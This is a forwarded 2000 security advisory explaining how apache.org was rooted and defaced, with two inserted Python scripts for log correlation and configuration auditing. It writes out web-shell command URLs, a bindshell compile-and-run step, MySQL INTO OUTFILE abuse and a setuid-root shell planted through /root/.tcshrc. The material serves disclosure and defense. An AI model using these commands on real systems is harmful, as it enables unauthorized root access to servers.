[iwar] FW: [NEWS] How apache.org was defaced


From: Robert W. Miller <snooker@iex.net>
To: iwar@egroups.com
Date: Tue, 9 May 2000 07:41:24 -0600


The following security advisory is sent to the securiteam mailing
list, and can be found at the SecuriTeam web site:
http://www.securiteam.com

How apache.org was defaced
--------------------------
SUMMARY

Although this article does not discuss any new vulnerability, it is
very important to read and understand the common configuration errors
which were made by the experienced people on apache.org. These
mistakes allowed apache.org to be compromised, but the attack was
performed by 'gray-hat' hackers, and therefore no damage was caused.

There are two important lessons to be learned:
1. Nobody is safe from configuration mistakes. If the developers of
the Apache web server, the most popular web server on the net, made
trivial configuration mistakes which allowed their web site to be
compromised, this could happen to anyone.
2. Don't trust anything you download off the Internet. If malicious
attackers had compromised apache.org, the source code of this popular
web server could easily have been modified to give the attackers some
kind of 'back-door' access. Therefore the recommended practice is to
download only cryptographically signed binaries or source code, and
to verify those signatures to make sure they're authentic.

DETAILS

This article describes how, over the course of a week, a group of
hackers succeeded in getting root access to the machine running
www.apache.org, and changed the main page to show a 'Powered by
Microsoft BackOffice' logo instead of the default 'Powered by Apache'
logo (the feather). No other changes were made, except to prevent
other people getting in.
(A mirrored version of apache.org's defaced site can be found at:
http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org)

Note that the problems described in this paper are not Apache-related;
these were all configuration errors (one of them is taken straight
from Bugzilla's README).

The vulnerability:
The directory structure under the FTP server ftp.apache.org made it
possible to upload files into a path that was mapped into the Apache
web server's document tree. This made it possible to upload PHP files
through the FTP server and then execute them from the web.

By using the following wuh.php3 script:


It was possible to create a "Trojan"-like PHP script on the remote
server. This script makes it possible to execute shell commands
remotely, by passing them as parameters to the PHP script.

For example, it was possible to execute the command 'id' by calling
the special script as follows:

  http://www.apache.org/thatdir/wuh.php3?cmd=id

Clearly, these shell commands run with the web server user's
permissions. While it is typically possible to gain root access from a
normal user account (using one of the buffer overflow vulnerabilities
or other exploits that are usually available on our exploits page),
our hackers wanted to gain root access using only configuration
vulnerabilities.

Next, a bindshell was uploaded to the same directory and compiled
(this was just as easy as using 'id'):
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
After the program was compiled, it was executed:
http://www.apache.org/thatdir/wuh.php3?cmd=./httpd

This gives complete shell access from remote.

This bindshell code allowed telnetting to a particular unprivileged
port (it was set to respond on TCP port 65533) and provided local
shell access with the access rights of the 'nobody' account (the
account Apache runs under).
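The web stage of this intrusion leaves two traces a defender can correlate: an FTP upload of a script file into a directory the web server also serves, followed by HTTP requests for that same file carrying a command in the query string. The Python script below is an added example, not part of the SecuriTeam advisory and not apache.org's own tooling. It parses wu-ftpd xferlog-style transfer records and Apache common-log lines, maps FTP paths to URLs under the assumption that the FTP server's /pub tree is the web document root, and reports every request that hits an uploaded script. The log lines, hosts and paths are constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample data (not from the advisory). The xferlog lines follow the
# wu-ftpd format: date (5 tokens), transfer-time, remote-host, size, filename,
# type, special-action, direction (i = upload, o = download), access-mode,
# username, service, auth-method, auth-uid, completion-status.
XFERLOG = """\
Mon May  1 10:00:12 2000 1 209.151.65.184 23 /pub/incoming/wuh.php3 a _ i a anonymous ftp 0 * c
Mon May  1 10:01:40 2000 2 209.151.65.184 1840 /pub/incoming/httpd.c a _ i a anonymous ftp 0 * c
Mon May  1 10:02:05 2000 3 10.0.0.9 51200 /pub/dist/apache_1.3.12.tar.gz b _ o a anonymous ftp 0 * c
"""

# Constructed Apache common-log lines: the uploaded script is requested with cmd=.
ACCESS_LOG = """\
209.151.65.184 - - [01/May/2000:10:05:00 -0700] "GET /incoming/wuh.php3?cmd=id HTTP/1.0" 200 45
209.151.65.184 - - [01/May/2000:10:06:10 -0700] "GET /incoming/wuh.php3?cmd=gcc+-o+httpd+httpd.c HTTP/1.0" 200 12
10.0.0.9 - - [01/May/2000:10:07:00 -0700] "GET /dist/apache_1.3.12.tar.gz HTTP/1.0" 200 51200
"""

# Assumption for this example: the FTP server's /pub tree is also the web
# server's document root, so /pub/x/y.php3 is served as /x/y.php3.
FTP_ROOT = "/pub"

# Extensions the web server would execute rather than serve as plain data.
SCRIPT_EXT = {".php", ".php3", ".phtml", ".cgi", ".pl", ".sh"}

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)')


def parse_xferlog(text):
    """Return one dict per transfer record; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 14:
            continue
        records.append({"time": " ".join(t[:5]), "host": t[6], "path": t[8],
                        "direction": t[11], "user": t[13]})
    return records


def uploaded_scripts(transfers, ftp_root):
    """Map web path -> upload record for every script-type file uploaded under ftp_root."""
    root = ftp_root.rstrip("/")
    staged = {}
    for r in transfers:
        if r["direction"] != "i" or not r["path"].startswith(root + "/"):
            continue
        if os.path.splitext(r["path"])[1].lower() in SCRIPT_EXT:
            staged[r["path"][len(root):]] = r
    return staged


def parse_access_log(text):
    """Parse Apache common-log lines into dicts with the query string decoded."""
    requests = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, _proto, status, _size = m.groups()
        url = urlsplit(target)
        requests.append({"ip": ip, "time": ts, "method": method, "path": url.path,
                         "query": parse_qs(url.query), "status": int(status)})
    return requests


def correlate(transfers, requests, ftp_root=FTP_ROOT):
    """Every HTTP request whose path is a script that arrived by FTP upload.
    A 'cmd' parameter makes it critical: that is the web-shell pattern in the advisory."""
    staged = uploaded_scripts(transfers, ftp_root)
    findings = []
    for q in requests:
        up = staged.get(q["path"])
        if up is None:
            continue
        cmd = q["query"].get("cmd", [None])[0]
        findings.append({"web_path": q["path"], "uploader": up["host"],
                         "uploaded_at": up["time"], "requester": q["ip"],
                         "requested_at": q["time"], "command": cmd,
                         "severity": "critical" if cmd else "high"})
    return findings


if __name__ == "__main__":
    for f in correlate(parse_xferlog(XFERLOG), parse_access_log(ACCESS_LOG)):
        print(f"[{f['severity']}] {f['web_path']} uploaded by {f['uploader']} "
              f"at {f['uploaded_at']}, requested by {f['requester']} "
              f"with cmd={f['command']!r}")
```

The match is keyed on the web path rather than on the query string, so a request for an uploaded script with no parameters at all is still reported (as "high"); the query is only used to raise severity and to show the operator what was run, which here includes the compiler invocation that staged the bindshell.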

After local access had been obtained, a higher level of access rights
was needed, namely root. After searching for the 'right' vulnerable
application, MySQL was chosen, because MySQL was running as user root
and because it was reachable locally. Apache.org was running Bugzilla,
which requires a MySQL account, and since the MySQL username and
password are written in plaintext in the Bugzilla source, it was easy
to get a username/password pair for the MySQL database.

Using a program called nportredird, the server could now accept
connections on port 23306 and redirect them to localhost port 3306,
enabling the use of a specially built MySQL client.

Having gained access to localhost port 3306, and using the login
'bugs' (which had full access [as in "all Y's"]), our attackers'
privileges were elevated substantially. This was mostly due to sloppy
reading of the Bugzilla README on the part of the apache.org system
administrator. The README does show a quick way to set things up (with
all Y's) but also has a lot of security warnings, including "don't run
mysqld as root".

Using 'SELECT ... INTO OUTFILE', it was possible to create files
anywhere, as root. These files were mode 666, but the MySQL server
would not overwrite existing files, so another approach was called
for.

A Trojan-like trick was used. A database called 'test' was created
with a one-column table with an 80-character text field. A couple of
inserts and one select later, a /root/.tcshrc was created with
contents similar to:
      #!/bin/sh
      cp /bin/sh /tmp/.rootsh
      chmod 4755 /tmp/.rootsh
      rm -f /root/.tcshrc

Quite trivial. Now it was just a matter of time until someone ran
'su -'. Luckily, with 9 people legitimately having root, this didn't
take long. The rest is trivial too: once root, defacing the site was
easy, but not until after a short report listing the vulnerabilities
and quick fixes had been written. Shortly after defacing the site, the
attackers sent this report to one of the administrators.

In short:
The vulnerabilities were due to:
 - Ftproot==webroot, world-writable directories allowing uploading and
   execution of php3 scripts.
 - Mysqld running as root, with a FULL RIGHTS login without a
   password.
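Both root causes in that list are configuration facts that can be checked on the host before anyone else does. The Python script below is an added example, not from the advisory and not Apache project code, of an audit that reports world-writable directories shared by the FTP and web trees, MySQL server processes owned by root in ps output, and MySQL accounts that have no password or hold the FILE privilege that SELECT ... INTO OUTFILE needs. The directory tree, process listing and mysql.user rows are all constructed inline; the column layout (Host, User, Password, File_priv) is the legacy mysql.user schema of that era, and on a real server you would substitute the rows from your own query.

```python
import os
import shutil
import stat
import tempfile

# Process names that indicate a MySQL server (assumed list for this example).
MYSQLD_NAMES = {"mysqld", "mysqld_safe", "safe_mysqld"}


def world_writable_dirs(root):
    """Every directory under root whose mode grants write access to 'other'."""
    hits = []
    for dirpath, _dirs, _files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            hits.append(dirpath)
    return sorted(hits)


def ftp_web_overlap(ftp_root, web_root):
    """World-writable directories that lie in both the FTP tree and the web tree.
    Anything here can be uploaded by FTP and then fetched (or executed) over HTTP."""
    f, w = os.path.realpath(ftp_root), os.path.realpath(web_root)
    if os.path.commonpath([f, w]) not in (f, w):
        return []                                    # disjoint trees: nothing shared
    return world_writable_dirs(f if f.startswith(w) else w)   # scan the inner tree


def mysqld_as_root(ps_output):
    """PIDs of MySQL server processes owned by root, from 'ps -eo user,pid,comm' output."""
    pids = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "root" and parts[2] in MYSQLD_NAMES:
            pids.append(int(parts[1]))
    return pids


def risky_mysql_accounts(rows):
    """rows: (Host, User, Password, File_priv) from the legacy mysql.user table.
    Flags empty passwords and non-root accounts holding FILE, the privilege that
    SELECT ... INTO OUTFILE needs to write files as the server's own user."""
    findings = []
    for host, user, password, file_priv in rows:
        if password == "":
            findings.append(f"{user}@{host}: empty password")
        if file_priv == "Y" and user != "root":
            findings.append(f"{user}@{host}: FILE privilege (can write files on the server)")
    return findings


def audit(ftp_root, web_root, ps_output, user_rows):
    """Combine the three checks into one list of human-readable findings."""
    findings = [f"world-writable directory shared by FTP and web trees: {d}"
                for d in ftp_web_overlap(ftp_root, web_root)]
    findings += [f"mysqld running as root (pid {pid})" for pid in mysqld_as_root(ps_output)]
    findings += risky_mysql_accounts(user_rows)
    return findings


# Constructed fixtures reproducing the advisory's two root causes.
PS_OUTPUT = """\
USER       PID COMMAND
root         1 init
root       412 mysqld
nobody     519 httpd
"""
USER_ROWS = [
    ("localhost", "root", "*PLACEHOLDER_HASH", "Y"),
    ("localhost", "bugs", "", "Y"),   # Bugzilla account set up "with all Y's" and no password
    ("%", "web", "*PLACEHOLDER_HASH", "N"),
]


def demo():
    """Build a throwaway tree where FTP root == web root and 'incoming' is mode 0777."""
    base = tempfile.mkdtemp()
    try:
        incoming = os.path.join(base, "incoming")
        os.makedirs(os.path.join(base, "dist"))
        os.makedirs(incoming)
        os.chmod(incoming, 0o777)
        return audit(base, base, PS_OUTPUT, USER_ROWS)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for line in demo():
        print("FINDING:", line)
```

The overlap check deliberately scans only the inner of the two trees: if the FTP root sits inside the web root (or the two are the same directory, as they were here), every world-writable directory in it is a place where an anonymous upload becomes a web-reachable file, and a separate check for script execution in those paths would be the next thing to add.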

ADDITIONAL INFORMATION

Information has been provided by: Peter van Dijk.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email
to: list-subscribe@securiteam.com
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or special damages.

Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net




